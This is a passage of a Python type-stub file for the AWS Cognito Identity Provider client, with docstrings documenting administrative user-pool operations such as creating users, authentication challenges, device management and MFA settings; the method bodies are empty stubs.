'MinLength': 'string',
'MaxLength': 'string'
}
},
]
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response from the server for the request to add custom attributes.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to add custom attributes.
:type CustomAttributes: list
:param CustomAttributes: **[REQUIRED]**
An array of custom attributes, such as Mutable and Name.
- *(dict) --*
Contains information about the schema attribute.
- **Name** *(string) --*
A schema attribute of the name type.
- **AttributeDataType** *(string) --*
The attribute data type.
- **DeveloperOnlyAttribute** *(boolean) --*
Specifies whether the attribute type is developer only.
- **Mutable** *(boolean) --*
Specifies whether the value of the attribute can be changed.
For any user pool attribute that\'s mapped to an identity provider attribute, you must set this parameter to ``true`` . Amazon Cognito updates mapped attributes when users sign in to your application through an identity provider. If an attribute is immutable, Amazon Cognito throws an error when it attempts to update the attribute. For more information, see `Specifying Identity Provider Attribute Mappings for Your User Pool <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-specifying-attribute-mapping.html>`__ .
- **Required** *(boolean) --*
Specifies whether a user pool attribute is required. If the attribute is required and the user does not provide a value, registration or sign-in will fail.
- **NumberAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the number type.
- **MinValue** *(string) --*
The minimum value of an attribute that is of the number data type.
- **MaxValue** *(string) --*
The maximum value of an attribute that is of the number data type.
- **StringAttributeConstraints** *(dict) --*
Specifies the constraints for an attribute of the string type.
- **MinLength** *(string) --*
The minimum length.
- **MaxLength** *(string) --*
The maximum length.
:rtype: dict
:returns:
"""
pass
def admin_add_user_to_group(self, UserPoolId: str, Username: str, GroupName: str):
"""
Adds the specified user to the specified group.
Requires developer credentials.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminAddUserToGroup>`_
**Request Syntax**
::
response = client.admin_add_user_to_group(
UserPoolId='string',
Username='string',
GroupName='string'
)
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool.
:type Username: string
:param Username: **[REQUIRED]**
The username for the user.
:type GroupName: string
:param GroupName: **[REQUIRED]**
The group name.
:returns: None
"""
pass
def admin_confirm_sign_up(self, UserPoolId: str, Username: str) -> Dict:
    """
    Confirms a user's registration as an administrator, without a confirmation code. Works on any user.
    Calling this operation requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminConfirmSignUp>`_
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The ID of the user pool in which the registration is confirmed.
    :type Username: string
    :param Username: **[REQUIRED]**
        The name of the user whose registration is being confirmed.
    :rtype: dict
    :returns: An empty response dict (``{}``).
    """
    # Generated client stub: the real request is dispatched by botocore at runtime.
    return None
def admin_create_user(self, UserPoolId: str, Username: str, UserAttributes: List = None, ValidationData: List = None, TemporaryPassword: str = None, ForceAliasCreation: bool = None, MessageAction: str = None, DesiredDeliveryMediums: List = None) -> Dict:
    """
    Creates a new user in the given user pool and, by default, sends the user an invitation.
    When ``MessageAction`` is omitted, a welcome message is delivered by email or SMS, based on the
    invitation template configured for the pool; the template carries your sign-up instructions plus
    placeholders for the user name and temporary password. Passing ``'SUPPRESS'`` for
    ``MessageAction`` prevents any message from being sent.
    In either case the new user stays in the ``FORCE_CHANGE_PASSWORD`` state until they sign in and
    choose a new password.
    Calling ``AdminCreateUser`` requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminCreateUser>`_
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The ID of the user pool in which the user is created.
    :type Username: string
    :param Username: **[REQUIRED]**
        The new user's username: unique within the pool, a UTF-8 string of 1 to 128 characters,
        immutable once the user exists.
    :type UserAttributes: list
    :param UserAttributes:
        Name/value pairs (each a dict with ``Name`` **[REQUIRED]** and ``Value``) to set on the new
        user. Attributes the pool marks as required must be supplied here or by the user at sign-up.
        Custom attribute names need the ``custom:`` prefix. You may set ``email_verified`` or
        ``phone_number_verified`` to ``True``. To deliver the invitation, include ``email`` (required
        when ``'EMAIL'`` is a desired medium or ``email_verified`` is ``True``) or ``phone_number``
        (required when ``'SMS'`` is a desired medium or ``phone_number_verified`` is ``True``).
    :type ValidationData: list
    :param ValidationData:
        Name/value pairs (same shape as ``UserAttributes``) handed, unpersisted, to the pool's
        Pre Sign-up Lambda trigger for custom validation — for example, allowing or rejecting
        sign-up based on the user's domain.
    :type TemporaryPassword: string
    :param TemporaryPassword:
        Single-use temporary password conforming to the pool's password policy; Amazon Cognito
        generates one when this is omitted. It is usable only until the pool's account expiration
        limit; after that, call ``AdminCreateUser`` again with ``MessageAction='RESEND'``.
    :type ForceAliasCreation: boolean
    :param ForceAliasCreation:
        Honored only when ``email_verified`` or ``phone_number_verified`` is ``True``. When ``True``,
        an email/phone alias already held by another user is migrated to the new user (the previous
        user can no longer sign in with it); when ``False`` (the default), an
        ``AliasExistsException`` is raised instead.
    :type MessageAction: string
    :param MessageAction:
        ``'RESEND'`` to re-send the invitation to an existing user and reset the account expiration
        limit, or ``'SUPPRESS'`` to send nothing. At most one value.
    :type DesiredDeliveryMediums: list
    :param DesiredDeliveryMediums:
        Any of ``'EMAIL'`` and ``'SMS'`` (the default) naming how the welcome message is delivered.
    :rtype: dict
    :returns:
        A dict with a ``User`` entry describing the newly created user: ``Username``,
        ``Attributes`` (name/value pairs), ``UserCreateDate``, ``UserLastModifiedDate``,
        ``Enabled``, ``UserStatus`` (e.g. ``FORCE_CHANGE_PASSWORD``), and ``MFAOptions``.
    """
    # Generated client stub: the real request is dispatched by botocore at runtime.
    return None
def admin_delete_user(self, UserPoolId: str, Username: str):
    """
    Deletes a user from a user pool as an administrator. Works on any user.
    Calling this operation requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminDeleteUser>`_
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The ID of the user pool containing the user.
    :type Username: string
    :param Username: **[REQUIRED]**
        The name of the user to delete.
    :returns: None
    """
    # Generated client stub: the real request is dispatched by botocore at runtime.
    return None
def admin_delete_user_attributes(self, UserPoolId: str, Username: str, UserAttributeNames: List) -> Dict:
    """
    Removes attributes from a user in a user pool, as an administrator. Works on any user.
    Calling this operation requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminDeleteUserAttributes>`_
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The ID of the user pool containing the user.
    :type Username: string
    :param Username: **[REQUIRED]**
        The name of the user whose attributes are removed.
    :type UserAttributeNames: list
    :param UserAttributeNames: **[REQUIRED]**
        The names (strings) of the attributes to delete; custom attribute names must carry the
        ``custom:`` prefix.
    :rtype: dict
    :returns: An empty response dict (``{}``).
    """
    # Generated client stub: the real request is dispatched by botocore at runtime.
    return None
def admin_disable_provider_for_user(self, UserPoolId: str, User: Dict) -> Dict:
    """
    Prevents a user from signing in through the given external (SAML or social) identity provider.
    For a native Cognito User Pools username+password user this blocks password sign-in; for a
    linked external IdP user, the link to the existing user is removed and the external identity
    (no longer attached to the previously linked ``DestinationUser``) must create a new account the
    next time it signs in.
    This action is admin-only and requires developer credentials.
    ``ProviderName`` must match the value given when the IdP was created for the pool. To disable a
    native user, pass ``ProviderName='Cognito'``, ``ProviderAttributeName='Cognito_Subject'``, and
    the pool username as ``ProviderAttributeValue``. For social identity providers,
    ``ProviderAttributeName`` is always ``Cognito_Subject`` and ``ProviderAttributeValue`` is the
    exact subject that was originally linked. For SAML identities: if the linked identity has not
    yet signed in, use the same attribute name/value that linked the identities; once it has signed
    in, use ``Cognito_Subject`` with the SAML assertion's subject.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminDisableProviderForUser>`_
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The ID of the user pool.
    :type User: dict
    :param User: **[REQUIRED]**
        The user to disable, described by ``ProviderName`` (e.g. Facebook, Google, or Login with
        Amazon), ``ProviderAttributeName`` (e.g. ``NameID``), and ``ProviderAttributeValue``.
    :rtype: dict
    :returns: An empty response dict (``{}``).
    """
    # Generated client stub: the real request is dispatched by botocore at runtime.
    return None
def admin_disable_user(self, UserPoolId: str, Username: str) -> Dict:
    """
    Disables a user in a user pool, as an administrator. Works on any user.
    Calling this operation requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminDisableUser>`_
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The ID of the user pool containing the user.
    :type Username: string
    :param Username: **[REQUIRED]**
        The name of the user to disable.
    :rtype: dict
    :returns: An empty response dict (``{}``).
    """
    # Generated client stub: the real request is dispatched by botocore at runtime.
    return None
def admin_enable_user(self, UserPoolId: str, Username: str) -> Dict:
    """
    Enables a user in a user pool, as an administrator. Works on any user.
    Calling this operation requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminEnableUser>`_
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The ID of the user pool containing the user.
    :type Username: string
    :param Username: **[REQUIRED]**
        The name of the user to enable.
    :rtype: dict
    :returns: An empty response dict (``{}``).
    """
    # Generated client stub: the real request is dispatched by botocore at runtime.
    return None
def admin_forget_device(self, UserPoolId: str, Username: str, DeviceKey: str):
    """
    Forgets (unregisters) a user's device, as an administrator.
    Calling this operation requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminForgetDevice>`_
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The ID of the user pool.
    :type Username: string
    :param Username: **[REQUIRED]**
        The name of the user.
    :type DeviceKey: string
    :param DeviceKey: **[REQUIRED]**
        The key of the device to forget.
    :returns: None
    """
    # Generated client stub: the real request is dispatched by botocore at runtime.
    return None
def admin_get_device(self, DeviceKey: str, UserPoolId: str, Username: str) -> Dict:
    """
    Retrieves a user's device, as an administrator.
    Calling this operation requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminGetDevice>`_
    :type DeviceKey: string
    :param DeviceKey: **[REQUIRED]**
        The key of the device to fetch.
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The ID of the user pool.
    :type Username: string
    :param Username: **[REQUIRED]**
        The name of the user the device belongs to.
    :rtype: dict
    :returns:
        A dict with a ``Device`` entry describing the device: ``DeviceKey``,
        ``DeviceAttributes`` (name/value pairs), ``DeviceCreateDate``,
        ``DeviceLastModifiedDate``, and ``DeviceLastAuthenticatedDate``.
    """
    # Generated client stub: the real request is dispatched by botocore at runtime.
    return None
def admin_get_user(self, UserPoolId: str, Username: str) -> Dict:
    """
    Retrieves a user by user name in a user pool, as an administrator. Works on any user.
    Calling this operation requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminGetUser>`_
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The ID of the user pool to query.
    :type Username: string
    :param Username: **[REQUIRED]**
        The name of the user to look up.
    :rtype: dict
    :returns:
        A dict describing the user: ``Username``, ``UserAttributes`` (name/value pairs),
        ``UserCreateDate``, ``UserLastModifiedDate``, ``Enabled``, ``UserStatus`` (one of
        ``UNCONFIRMED``, ``CONFIRMED``, ``ARCHIVED``, ``COMPROMISED``, ``UNKNOWN``,
        ``RESET_REQUIRED``, or ``FORCE_CHANGE_PASSWORD``), ``MFAOptions`` (each with
        ``DeliveryMedium`` and ``AttributeName``), ``PreferredMfaSetting``, and
        ``UserMFASettingList``.
    """
    # Generated client stub: the real request is dispatched by botocore at runtime.
    return None
def admin_initiate_auth(self, UserPoolId: str, ClientId: str, AuthFlow: str, AuthParameters: Dict = None, ClientMetadata: Dict = None, AnalyticsMetadata: Dict = None, ContextData: Dict = None) -> Dict:
    """
    Starts an authentication flow, as an administrator.
    Calling this operation requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminInitiateAuth>`_
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The ID of the Amazon Cognito user pool.
    :type ClientId: string
    :param ClientId: **[REQUIRED]**
        The app client ID.
    :type AuthFlow: string
    :param AuthFlow: **[REQUIRED]**
        The authentication flow to execute; the API action depends on this value. Valid values:
        * ``USER_SRP_AUTH`` : Secure Remote Password (SRP) flow — takes ``USERNAME`` and ``SRP_A``
          and returns the SRP variables for the next challenge.
        * ``REFRESH_TOKEN_AUTH`` / ``REFRESH_TOKEN`` : exchanges a valid refresh token for fresh
          access and ID tokens.
        * ``CUSTOM_AUTH`` : custom authentication flow.
        * ``ADMIN_NO_SRP_AUTH`` : non-SRP flow passing ``USERNAME`` and ``PASSWORD`` directly; the
          flow must be enabled on the app client.
        * ``USER_PASSWORD_AUTH`` : non-SRP flow passing ``USERNAME`` and ``PASSWORD`` directly;
          invokes the user migration Lambda, when one is configured, if the user is not found.
    :type AuthParameters: dict
    :param AuthParameters:
        String-to-string inputs for the chosen ``AuthFlow``:
        * ``USER_SRP_AUTH`` : ``USERNAME`` and ``SRP_A`` (required), ``DEVICE_KEY``
        * ``REFRESH_TOKEN_AUTH``/``REFRESH_TOKEN`` : ``REFRESH_TOKEN`` (required), ``DEVICE_KEY``
        * ``ADMIN_NO_SRP_AUTH`` : ``USERNAME`` and ``PASSWORD`` (required), ``DEVICE_KEY``
        * ``CUSTOM_AUTH`` : ``USERNAME`` (required), ``DEVICE_KEY``
        In every flow, add ``SECRET_HASH`` when the app client is configured with a client secret.
    :type ClientMetadata: dict
    :param ClientMetadata:
        Arbitrary key/value pairs forwarded as-is to your PreAuthentication Lambda trigger, usable
        for additional validation around authentication.
    :type AnalyticsMetadata: dict
    :param AnalyticsMetadata:
        Amazon Pinpoint analytics metadata for ``AdminInitiateAuth`` calls; contains
        ``AnalyticsEndpointId``.
    :type ContextData: dict
    :param ContextData:
        Contextual data — device fingerprint, IP address, location — used by Amazon Cognito
        advanced security to evaluate risk. ``IpAddress``, ``ServerName``, ``ServerPath``, and
        ``HttpHeaders`` (list of ``headerName``/``headerValue`` dicts, in order received) are
        required; ``EncodedData`` carries fingerprint details from the context data collection
        library.
    :rtype: dict
    :returns:
        When authentication completes, ``AuthenticationResult`` with ``AccessToken``,
        ``ExpiresIn``, ``TokenType``, ``RefreshToken``, ``IdToken``, and ``NewDeviceMetadata``.
        When another challenge is required, ``ChallengeName`` (e.g. ``SMS_MFA``, ``MFA_SETUP``,
        ``SELECT_MFA_TYPE``, ``PASSWORD_VERIFIER``, ``CUSTOM_CHALLENGE``, ``DEVICE_SRP_AUTH``,
        ``DEVICE_PASSWORD_VERIFIER``, ``ADMIN_NO_SRP_AUTH``, ``NEW_PASSWORD_REQUIRED``),
        ``ChallengeParameters`` (always including ``USERNAME``, and ``SECRET_HASH`` if applicable;
        ``USER_ID_FOR_SRP`` holds the actual username, never an alias), and a ``Session`` to pass
        unchanged to the next ``AdminRespondToAuthChallenge`` call.
    """
    # Generated client stub: the real request is dispatched by botocore at runtime.
    return None
def admin_link_provider_for_user(self, UserPoolId: str, DestinationUser: Dict, SourceUser: Dict) -> Dict:
    """
    Links an existing user-pool account (``DestinationUser``) to a federated identity from an
    external identity provider (``SourceUser``), matched by a provider attribute name and value.
    The federated identity must not yet have been used to sign in; afterwards, signing in with it
    signs the user in as the existing account.
    .. warning::
        Because this lets a user with an external federated identity sign in as an existing pool
        user, use it only with identity providers and provider attributes the application owner
        trusts.
    This action is admin-only and requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminLinkProviderForUser>`_
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]**
        The ID of the user pool.
    :type DestinationUser: dict
    :param DestinationUser: **[REQUIRED]**
        The existing pool user to link to — native (username + password) or federated (e.g. SAML or
        Facebook); an exception is thrown if it does not exist. For a native user, set
        ``ProviderName`` to ``Cognito`` and ``ProviderAttributeValue`` to the pool username
        (``ProviderAttributeName`` is ignored); for a federated user, use the provider-specific
        ``user_id``.
    :type SourceUser: dict
    :param SourceUser: **[REQUIRED]**
        The federated identity (never another native user) that does not yet exist in the pool.
        For Facebook, Google, or Login with Amazon, set ``ProviderAttributeName`` to
        ``Cognito_Subject`` and ``ProviderAttributeValue`` to the value of ``id``, ``sub``, or
        ``user_id`` (respectively) from the provider's token; ``ProviderName`` is ``Facebook``,
        ``Google``, or ``LoginWithAmazon``. For SAML, ``ProviderAttributeName`` may be any claim in
        the assertion — or ``Cognito_Subject`` to use the assertion's default unique identifier.
    :rtype: dict
    :returns: An empty response dict (``{}``).
    """
    # Generated client stub: the real request is dispatched by botocore at runtime.
    return None
def admin_list_devices(self, UserPoolId: str, Username: str, Limit: int = None, PaginationToken: str = None) -> Dict:
    """
    Lists a user's remembered devices, as an administrator.

    Requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminListDevices>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type Username: string
    :param Username: **[REQUIRED]** The user name.
    :type Limit: integer
    :param Limit: The limit of the devices request.
    :type PaginationToken: string
    :param PaginationToken: The pagination token.
    :rtype: dict
    :returns: A dict with a ``Devices`` list (each entry carrying
        ``DeviceKey``, a ``DeviceAttributes`` list of name/value pairs,
        ``DeviceCreateDate``, ``DeviceLastModifiedDate`` and
        ``DeviceLastAuthenticatedDate`` datetimes) plus a
        ``PaginationToken`` string for fetching the next page.
    """
    pass
def admin_list_groups_for_user(self, Username: str, UserPoolId: str, Limit: int = None, NextToken: str = None) -> Dict:
    """
    Lists the groups that the given user belongs to.

    Requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminListGroupsForUser>`_

    :type Username: string
    :param Username: **[REQUIRED]** The username for the user.
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool.
    :type Limit: integer
    :param Limit: The limit of the request to list groups.
    :type NextToken: string
    :param NextToken: An identifier returned from a previous call to this
        operation, used to return the next set of items in the list.
    :rtype: dict
    :returns: A dict with a ``Groups`` list (each group carrying
        ``GroupName``, ``UserPoolId``, ``Description``, ``RoleArn``,
        ``Precedence``, ``LastModifiedDate`` and ``CreationDate``) and a
        ``NextToken`` string. ``Precedence`` is a nonnegative integer:
        when a user is in several groups, the group with the highest
        precedence supplies the role ARN used in the ``cognito:roles``
        and ``cognito:preferred_role`` token claims; null precedence is
        the default and is outranked by any numeric value.
    """
    pass
def admin_list_user_auth_events(self, UserPoolId: str, Username: str, MaxResults: int = None, NextToken: str = None) -> Dict:
    """
    Lists a history of user activity and any risks detected as part of
    Amazon Cognito advanced security.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminListUserAuthEvents>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type Username: string
    :param Username: **[REQUIRED]** The user pool username or an alias.
    :type MaxResults: integer
    :param MaxResults: The maximum number of authentication events to return.
    :type NextToken: string
    :param NextToken: A pagination token.
    :rtype: dict
    :returns: A dict with an ``AuthEvents`` list and a ``NextToken``
        pagination string. Each event carries ``EventId``, ``EventType``
        (``SignIn`` | ``SignUp`` | ``ForgotPassword``), ``CreationDate``,
        ``EventResponse`` (``Success`` | ``Failure``), an ``EventRisk``
        dict (``RiskDecision``, ``RiskLevel``), a ``ChallengeResponses``
        list (``ChallengeName``, ``ChallengeResponse``), an
        ``EventContextData`` dict (``IpAddress``, ``DeviceName``,
        ``Timezone``, ``City``, ``Country``) and an ``EventFeedback``
        dict (``FeedbackValue``, ``Provider``, ``FeedbackDate``).
    """
    pass
def admin_remove_user_from_group(self, UserPoolId: str, Username: str, GroupName: str) -> None:
    """
    Removes the specified user from the specified group.

    Requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminRemoveUserFromGroup>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool.
    :type Username: string
    :param Username: **[REQUIRED]** The username for the user.
    :type GroupName: string
    :param GroupName: **[REQUIRED]** The group name.
    :returns: None
    """
    # NOTE(review): added the explicit `-> None` return annotation for
    # consistency with the sibling stubs, which annotate their returns
    # (`-> Dict`); the docstring already documented `:returns: None`.
    pass
def admin_reset_user_password(self, UserPoolId: str, Username: str) -> Dict:
    """
    Resets the specified user's password in a user pool as an
    administrator. Works on any user.

    Calling this invalidates the current password, so it must be changed.
    A subsequent sign-in attempt receives a PasswordResetRequiredException
    and the user should be sent through the forgot-password flow. If the
    pool has phone (or email) verification enabled and the user has a
    verified phone number (or email), a message with the password-change
    code is also sent to the user.

    Requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminResetUserPassword>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool
        where you want to reset the user's password.
    :type Username: string
    :param Username: **[REQUIRED]** The user name of the user whose
        password you wish to reset.
    :rtype: dict
    :returns: An empty dict representing the server's response.
    """
    pass
def admin_respond_to_auth_challenge(self, UserPoolId: str, ClientId: str, ChallengeName: str, ChallengeResponses: Dict = None, Session: str = None, AnalyticsMetadata: Dict = None, ContextData: Dict = None) -> Dict:
    """
    Responds to an authentication challenge, as an administrator.

    Requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminRespondToAuthChallenge>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The ID of the Amazon Cognito user pool.
    :type ClientId: string
    :param ClientId: **[REQUIRED]** The app client ID.
    :type ChallengeName: string
    :param ChallengeName: **[REQUIRED]** The challenge name, one of
        ``SMS_MFA`` | ``SOFTWARE_TOKEN_MFA`` | ``SELECT_MFA_TYPE`` |
        ``MFA_SETUP`` | ``PASSWORD_VERIFIER`` | ``CUSTOM_CHALLENGE`` |
        ``DEVICE_SRP_AUTH`` | ``DEVICE_PASSWORD_VERIFIER`` |
        ``ADMIN_NO_SRP_AUTH`` | ``NEW_PASSWORD_REQUIRED``.
    :type ChallengeResponses: dict
    :param ChallengeResponses: String-to-string inputs matching the value
        of ``ChallengeName``, for example:

        * ``SMS_MFA``: ``SMS_MFA_CODE``, ``USERNAME``, ``SECRET_HASH``
          (if the app client has a client secret).
        * ``PASSWORD_VERIFIER``: ``PASSWORD_CLAIM_SIGNATURE``,
          ``PASSWORD_CLAIM_SECRET_BLOCK``, ``TIMESTAMP``, ``USERNAME``,
          ``SECRET_HASH`` (if the app client has a client secret).
        * ``ADMIN_NO_SRP_AUTH``: ``PASSWORD``, ``USERNAME``,
          ``SECRET_HASH`` (if the app client has a client secret).
        * ``NEW_PASSWORD_REQUIRED``: ``NEW_PASSWORD``, any other required
          attributes, ``USERNAME``, ``SECRET_HASH`` (if the app client
          has a client secret).

        ``USERNAME`` must be the user's actual username, not an alias
        (such as an email address or phone number); the
        ``AdminInitiateAuth`` response exposes the actual username in the
        ``USERNAMEUSER_ID_FOR_SRP`` attribute even when an alias was used.
    :type Session: string
    :param Session: The session that must be passed both ways in
        challenge-response calls. If ``InitiateAuth`` or
        ``RespondToAuthChallenge`` determines the caller must complete
        another challenge, it returns a session to pass unchanged to the
        next ``RespondToAuthChallenge`` call.
    :type AnalyticsMetadata: dict
    :param AnalyticsMetadata: Amazon Pinpoint analytics metadata for
        ``AdminRespondToAuthChallenge`` calls; contains
        ``AnalyticsEndpointId`` *(string)*, the endpoint ID.
    :type ContextData: dict
    :param ContextData: Contextual data (device fingerprint, IP address,
        location) used by Amazon Cognito advanced security to evaluate
        risk. Required keys: ``IpAddress`` *(string)*, ``ServerName``
        *(string)*, ``ServerPath`` *(string)* and ``HttpHeaders`` *(list
        of dicts with ``headerName``/``headerValue``, in the order
        received)*. Optional: ``EncodedData`` *(string)*, device
        fingerprinting details collected with the Amazon Cognito context
        data collection library.
    :rtype: dict
    :returns: A dict with ``ChallengeName``, ``Session``,
        ``ChallengeParameters`` (string-to-string) and an
        ``AuthenticationResult`` dict carrying ``AccessToken``,
        ``ExpiresIn`` (seconds), ``TokenType``, ``RefreshToken``,
        ``IdToken`` and ``NewDeviceMetadata`` (``DeviceKey``,
        ``DeviceGroupKey``).
    """
    pass
def admin_set_user_mfa_preference(self, Username: str, UserPoolId: str, SMSMfaSettings: Dict = None, SoftwareTokenMfaSettings: Dict = None) -> Dict:
    """
    Sets the user's multi-factor authentication (MFA) preference.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminSetUserMFAPreference>`_

    :type Username: string
    :param Username: **[REQUIRED]** The user pool username or alias.
    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type SMSMfaSettings: dict
    :param SMSMfaSettings: The SMS text message MFA settings:
        ``Enabled`` *(boolean)*, whether SMS text message MFA is
        enabled, and ``PreferredMfa`` *(boolean)*, whether it is the
        preferred MFA method.
    :type SoftwareTokenMfaSettings: dict
    :param SoftwareTokenMfaSettings: The time-based one-time password
        software token MFA settings: ``Enabled`` *(boolean)*, whether
        software token MFA is enabled, and ``PreferredMfa`` *(boolean)*,
        whether it is the preferred MFA method.
    :rtype: dict
    :returns: An empty dict.
    """
    pass
def admin_set_user_settings(self, UserPoolId: str, Username: str, MFAOptions: List) -> Dict:
    """
    Sets all the user settings for a specified user name. Works on any user.

    Requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminSetUserSettings>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool
        where you want to set the user's settings, such as MFA options.
    :type Username: string
    :param Username: **[REQUIRED]** The user name of the user for whom
        you wish to set user settings.
    :type MFAOptions: list
    :param MFAOptions: **[REQUIRED]** The MFA options (e.g., email or
        phone number). Each element is a dict with ``DeliveryMedium``
        *(string)* — ``SMS`` or ``EMAIL``, the medium used to send the
        MFA code — and ``AttributeName`` *(string)*, the attribute name
        of the MFA option type.
    :rtype: dict
    :returns: An empty dict representing the server's response.
    """
    pass
def admin_update_auth_event_feedback(self, UserPoolId: str, Username: str, EventId: str, FeedbackValue: str) -> Dict:
    """
    Provides feedback on whether an authentication event came from a
    valid user. The feedback improves the risk evaluation decision for
    the user pool as part of Amazon Cognito advanced security.

    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminUpdateAuthEventFeedback>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type Username: string
    :param Username: **[REQUIRED]** The user pool username.
    :type EventId: string
    :param EventId: **[REQUIRED]** The authentication event ID.
    :type FeedbackValue: string
    :param FeedbackValue: **[REQUIRED]** The authentication event
        feedback value, ``Valid`` or ``Invalid``.
    :rtype: dict
    :returns: An empty dict.
    """
    pass
def admin_update_device_status(self, UserPoolId: str, Username: str, DeviceKey: str, DeviceRememberedStatus: str = None) -> Dict:
    """
    Updates a device's remembered status, as an administrator.

    Requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminUpdateDeviceStatus>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type Username: string
    :param Username: **[REQUIRED]** The user name.
    :type DeviceKey: string
    :param DeviceKey: **[REQUIRED]** The device key.
    :type DeviceRememberedStatus: string
    :param DeviceRememberedStatus: Whether the device has been
        remembered, ``remembered`` or ``not_remembered``.
    :rtype: dict
    :returns: An empty dict representing the status response.
    """
    pass
def admin_update_user_attributes(self, UserPoolId: str, Username: str, UserAttributes: List) -> Dict:
    """
    Updates the specified user's attributes, including developer
    attributes, as an administrator. Works on any user.

    For custom attributes, the ``custom:`` prefix must be prepended to
    the attribute name. Besides updating attributes, this API can also
    mark phone and email as verified.

    Requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminUpdateUserAttributes>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID for the user pool
        where you want to update user attributes.
    :type Username: string
    :param Username: **[REQUIRED]** The user name of the user for whom
        you want to update user attributes.
    :type UserAttributes: list
    :param UserAttributes: **[REQUIRED]** An array of name-value pairs
        representing user attributes. Each element is a dict with
        ``Name`` *(string)* **[REQUIRED]** and ``Value`` *(string)*;
        custom attribute names must carry the ``custom:`` prefix.
    :rtype: dict
    :returns: An empty dict representing the server's response.
    """
    pass
def admin_user_global_sign_out(self, UserPoolId: str, Username: str) -> Dict:
    """
    Signs out a user from all devices, as an administrator.

    Requires developer credentials.
    See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/AdminUserGlobalSignOut>`_

    :type UserPoolId: string
    :param UserPoolId: **[REQUIRED]** The user pool ID.
    :type Username: string
    :param Username: **[REQUIRED]** The user name.
    :rtype: dict
    :returns: An empty dict representing the global sign-out response.
    """
    pass
def associate_software_token(self, AccessToken: str = None, Session: str = None) -> Dict:
    """
    Returns a unique generated shared secret key code for the user
    account. The request takes an access token or a session string, but
    not both.

